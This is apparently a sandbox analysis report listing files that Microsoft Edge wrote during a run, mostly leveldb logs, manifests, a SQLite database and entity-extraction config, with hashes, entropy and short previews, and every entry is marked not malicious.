                                                                                                                                                                                                                                                                                                                                                              Preview:....(BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":6,"bloomFilterArraySize":3957785,"primeBases":[5381,5381,5381,5381],"supportedDomains":"dZsnzzKOjGQLMS7JuG6O4fm8IQtJDIVRbkJfYFUXB5RvXDKZih44Q+jI1glfqWpU64USEMcaiiQvxGs5knzJkr2qjfT3aiGsXZNyq1FupGvkeVmgTygCDCSB11F76W2ttdpM+4/w+hFOHpMbUECVRTwQkRZC4keTKY6OG0eDZBhSv9JF+E9EG0wo6l5c4U/ryQJ2OOHaJkUenHnZMiE4Tj76sK8GBnWlTJrt8f5w/+yHaafqYwDdapAqfluXa2Sc7ykqpFoLRcQhoNFVEKTpANC5g8efT+ARnbprDJl4ZZFvcUY4HAH9qX51rdDvnkN92xI3pF4zOzEWrUiAgP395Gg1waOIp8By4ph/JX1yL/LTTFNYpbMaTUE+5hOLVolRzquIfkWejtxLOoTCVSzNEBMyz9tTWjIY2wJIb8V5TzZoTggEcYl3PLJdRHH910ljbhqmJmY/r3SYBlmRFtnSnzQ1HkxCgSmyn8T8akozBmrLgbymEQr8GDsAIGXLEm1IMraPo6dqKUM61whCCfmeDjtndJp2W9+aefGAXwTOVk7na8Imn6KqedPRzgalw7lSy0YqXuAxHIDklUZVwp4eqbqh3vItcEKDjWNN90MyIpCc/ZrZHg/aRL1G2ydEiaJUg3C8Fxf/yzmlhl4JTx29dSXLFxYxzThTKhPfPHMgGWRpb2iblUc+EcYC1c8emNi82zqCME9tYS0GsCE1OOLBBrrwmmEkck07KxfAcoKlQRCuNIabWhsyPzQYDbvsntj5ECSZjnQ6rbTqpTosa8i8HHicvDeE43xCpYRDvpmTkrnbBnzZiN/9uMiBTwN5eiajOW8BTSfOAUEsAVY

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):508
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.271298880843901
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:7j9+vdZYebn9GFUtCJ/U9V5wZYebn95Z9Q/FIf0nf/Kh:7ubYeb9ig3gYeb9zWqh
                                                                                                                                                                                                                                                                                                                                                              MD5:1B4E4F9B7066781C876EC8CBEAD24C24
                                                                                                                                                                                                                                                                                                                                                              SHA1:88A87832003D7644BF581E5B6167A7A186C01592
                                                                                                                                                                                                                                                                                                                                                              SHA-256:607FACA549CB7A870D7D1F5B7561D27A67EC8F483CEE445AE19E1382FB2E0D0F
                                                                                                                                                                                                                                                                                                                                                              SHA-512:531F308569663B4AB321F8C06EE08389371AAF7BA9C64355CD6309B42D7BDBD0804A92F9DB99F4AC1BDB400CA03F1E0178EE698FAC0D5D48E2BD252E73B64046
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:42.813 18dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/02/18-02:16:42.816 18dc Recovering log #3.2025/02/18-02:16:42.816 18dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2025/02/18-02:16:51.655 1794 Level-0 table #5: started.2025/02/18-02:16:51.679 1794 Level-0 table #5: 668169 bytes OK.2025/02/18-02:16:51.681 1794 Delete type=0 #3.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):508
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.271298880843901
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:7j9+vdZYebn9GFUtCJ/U9V5wZYebn95Z9Q/FIf0nf/Kh:7ubYeb9ig3gYeb9zWqh
                                                                                                                                                                                                                                                                                                                                                              MD5:1B4E4F9B7066781C876EC8CBEAD24C24
                                                                                                                                                                                                                                                                                                                                                              SHA1:88A87832003D7644BF581E5B6167A7A186C01592
                                                                                                                                                                                                                                                                                                                                                              SHA-256:607FACA549CB7A870D7D1F5B7561D27A67EC8F483CEE445AE19E1382FB2E0D0F
                                                                                                                                                                                                                                                                                                                                                              SHA-512:531F308569663B4AB321F8C06EE08389371AAF7BA9C64355CD6309B42D7BDBD0804A92F9DB99F4AC1BDB400CA03F1E0178EE698FAC0D5D48E2BD252E73B64046
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:42.813 18dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/02/18-02:16:42.816 18dc Recovering log #3.2025/02/18-02:16:42.816 18dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2025/02/18-02:16:51.655 1794 Level-0 table #5: started.2025/02/18-02:16:51.679 1794 Level-0 table #5: 668169 bytes OK.2025/02/18-02:16:51.681 1794 Delete type=0 #3.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):103
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.267898014713841
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjD8k6yhinp48xFxN3erkEtl:scoBY7jDgxpNxFDkHl
                                                                                                                                                                                                                                                                                                                                                              MD5:A317F91672862C65E3BC45E0430C28BA
                                                                                                                                                                                                                                                                                                                                                              SHA1:7E8B84C7CA55A35EAF5057787DC1DE09879181C9
                                                                                                                                                                                                                                                                                                                                                              SHA-256:DDD49E90DC0AA509F5187E4D4BBE48FBE215DEC7100F61F1056A080B926437F8
                                                                                                                                                                                                                                                                                                                                                              SHA-512:AD27F83A319185A56D986F4E4E826F93F8DD3A512C48ABDFFD556A104F02D1F3FC3B16FAF15BFF250A8945FCEE306BD244A3FE88E47CB5F9E7F82ACBB5620FAD
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator........hT7...............(.BLOOM_FILTER:.........DB_VERSION........

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6135310378546351
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mW5eC3X5MAqr:TLapR+DDNzWjJ0npnyXKUO8+j4bprmL
                                                                                                                                                                                                                                                                                                                                                              MD5:BD173601A32FF463AB42628E67421F90
                                                                                                                                                                                                                                                                                                                                                              SHA1:4E553240BA37EB47867F3AEB1BA77D291C986FAF
                                                                                                                                                                                                                                                                                                                                                              SHA-256:4C27B9A12005C4376F15AD025C351E44E1DBC3807C43F3949ED8852E38D324A7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9C0FF2902D227AE89770E2CCCA9FA065C455AF7E49FC7EB38010E2D9A5EF97B4FE6B25F45D2583C281004F411AD19EFB9093F5DCAB0CA372E31F87B3D244A70A
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):670980
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.398658003246408
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:+FdMyq49tEndBuHltBfdK5WNbsVEziP/CfXtLP53MD/:+FxMD/
                                                                                                                                                                                                                                                                                                                                                              MD5:D2666F31EBDD4134147350EDC8D7F64A
                                                                                                                                                                                                                                                                                                                                                              SHA1:6A9B558A694865D8C9F2EA58FF447A3F89365AB1
                                                                                                                                                                                                                                                                                                                                                              SHA-256:8A2996140C9BD4D8B1D04A14A20F7765BA8A9C484B5D79EA8FE5EF415C52697D
                                                                                                                                                                                                                                                                                                                                                              SHA-512:D7E67FB1482BBD22B2B2AAC571B6CBA18066B86D49C60E9AEE5487D90C6087613F88BB237DF0626F1DDB9C12477686AA8FD2D69CD8C3AA4F7AAC36E3805E203B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1fL.Hq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13384336615824903..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):307
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.229898938966431
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXfgP3oM1Fi23oH+Tcwtk2WwnvB2KLl1fgnQS34q2PFi23oH+Tcwtk2WwnvIFUv:7YP3oqZYebkxwnvFL0YvdZYebkxwnQF2
                                                                                                                                                                                                                                                                                                                                                              MD5:E207771BC096FBF9F5E9AB58E2240C5B
                                                                                                                                                                                                                                                                                                                                                              SHA1:E7A811BCADF44272CD4C15AD2EDA68031D15340A
                                                                                                                                                                                                                                                                                                                                                              SHA-256:6521D6156AC5BE839FF797BA4016B8A777921B4D21BB9FD107E474E06EC96078
                                                                                                                                                                                                                                                                                                                                                              SHA-512:BF6FF2BB87789202F4375CF3449903480A6B1631F79382D1C8AC2AE0AC756D58B6C565575AE6945875CD85A6C20A58842579404FC3C7819A67E5BC1E83AC8CE8
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:54.592 1344 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/02/18-02:16:54.653 1344 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):358860
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.324617371530641
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rp:C1gAg1zfvh
                                                                                                                                                                                                                                                                                                                                                              MD5:C1E003FA889FD0D95901D3F256580A69
                                                                                                                                                                                                                                                                                                                                                              SHA1:EE3B0E6E3EF1999FB3D91AE5A060351B9A6718CE
                                                                                                                                                                                                                                                                                                                                                              SHA-256:5CC3957139F74435625CB82AC20553C5DE4777788C064417C507E9C68C42A4EA
                                                                                                                                                                                                                                                                                                                                                              SHA-512:573DC9AECA4AA2B798207D4DC84F24266D903E082D7ABB8FEB4EAC341ED99D0EB341BDC607E306745E78BE04C2528444833351103E4EE7374B92A4BCAA722197
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):418
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                                                              MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                                                              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                                                              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                                                              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):320
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2200672459850335
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXf5pQWM+q2PFi23oH+Tcwt8aPrqIFUtFfvwpG1Zmw7fvwpQWMVkwOFi23oH+Ts:7xi+vdZYebL3FUt1wo1/zwiV5wZYebQJ
                                                                                                                                                                                                                                                                                                                                                              MD5:D6E5036CDDC0DA5A1762C676E1590721
                                                                                                                                                                                                                                                                                                                                                              SHA1:E35F755E4EA904C650936397DCC0FF107D985610
                                                                                                                                                                                                                                                                                                                                                              SHA-256:084F1EC02BB31CE5F5F75EEA27B464485AEB22ADB5982FF3306D9D46C567C69E
                                                                                                                                                                                                                                                                                                                                                              SHA-512:631DA5238118B008F243A32F0233B3E0B0132DB851065CE6CF70187D0EA458716E94283B83F2049C2991B1A09D003DACDFB77C101EC5384E9947EB3B105EEA61
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:42.814 17ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/02/18-02:16:42.815 17ac Recovering log #3.2025/02/18-02:16:42.815 17ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):320
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2200672459850335
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXf5pQWM+q2PFi23oH+Tcwt8aPrqIFUtFfvwpG1Zmw7fvwpQWMVkwOFi23oH+Ts:7xi+vdZYebL3FUt1wo1/zwiV5wZYebQJ
                                                                                                                                                                                                                                                                                                                                                              MD5:D6E5036CDDC0DA5A1762C676E1590721
                                                                                                                                                                                                                                                                                                                                                              SHA1:E35F755E4EA904C650936397DCC0FF107D985610
                                                                                                                                                                                                                                                                                                                                                              SHA-256:084F1EC02BB31CE5F5F75EEA27B464485AEB22ADB5982FF3306D9D46C567C69E
                                                                                                                                                                                                                                                                                                                                                              SHA-512:631DA5238118B008F243A32F0233B3E0B0132DB851065CE6CF70187D0EA458716E94283B83F2049C2991B1A09D003DACDFB77C101EC5384E9947EB3B105EEA61
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:2025/02/18-02:16:42.814 17ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/02/18-02:16:42.815 17ac Recovering log #3.2025/02/18-02:16:42.815 17ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):418
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                                                              MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                                                              SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                                                              SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                                                              SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.227316910272456
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:6:iOXf7LKQWM+q2PFi23oH+Tcwt865IFUtFfAZG1Zmw7f++QWMVkwOFi23oH+TcwtD:7zLv+vdZYeb/WFUtn1/ajV5wZYeb/+SJ
                                                                                                                                                                                                                                                                                                                                                              MD5:992063D54E06B9DC43A7BF0B6A518FE5
                                                                                                                                                                                                                                                                                                                                                              SHA1:AE1CB893FB7255D45053A8C529931F4FB0584B34
